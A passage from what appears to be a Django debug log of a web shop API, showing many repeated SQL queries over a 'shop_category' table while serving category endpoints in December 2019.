HTTP/1.0" 200 942 DEBUG 2019-12-19 13:57:18,279 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:57:18,282 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:57:18,285 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:57:18,288 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:57:18,290 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:57:18,292 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:57:18,295 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:57:18,298 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:57:18,300 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:57:18,303 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:57:18,305 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:57:18,307 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:57:18,311 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:57:18,313 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:57:18,316 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:57:18,318 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:57:18,321 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:57:18,324 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:57:18,327 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:57:18,329 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:57:18,331 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:57:18,334 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:57:18,336 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:57:18,340 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:57:18,342 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:57:18,344 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:57:18,347 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:57:18,349 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:57:18,353 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:57:18,355 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:57:18,357 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:57:18,360 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:57:18,362 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:57:18,366 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:57:18,368 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:57:18,370 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:57:18,372 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:57:18,374 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:57:18,377 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:57:18,380 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:57:18,382 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:57:18,384 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:57:18,387 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:57:18,389 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:57:18] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:59:27,063 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:59:27,070 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:59:27,073 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:59:27,076 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:59:27,079 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:59:27,082 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:59:27,085 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:59:27,088 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:59:27,092 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:59:27,097 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:59:27,103 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:59:27,106 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:59:27,108 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:59:27,110 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 3; args=(3,) DEBUG 2019-12-19 13:59:27,114 utils 4252 140031492613888 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:59:27,119 utils 4252 140031503103744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:59:27,122 utils 4252 140031492613888 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:59:27,125 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) [19/Dec/2019 13:59:27] "GET /api/v1/categories/3 HTTP/1.0" 200 942 DEBUG 2019-12-19 13:59:27,127 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:59:27,130 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:59:27,132 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:59:27,136 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:59:27,139 utils 4252 140031492613888 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:59:27,142 utils 4252 140031492613888 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", 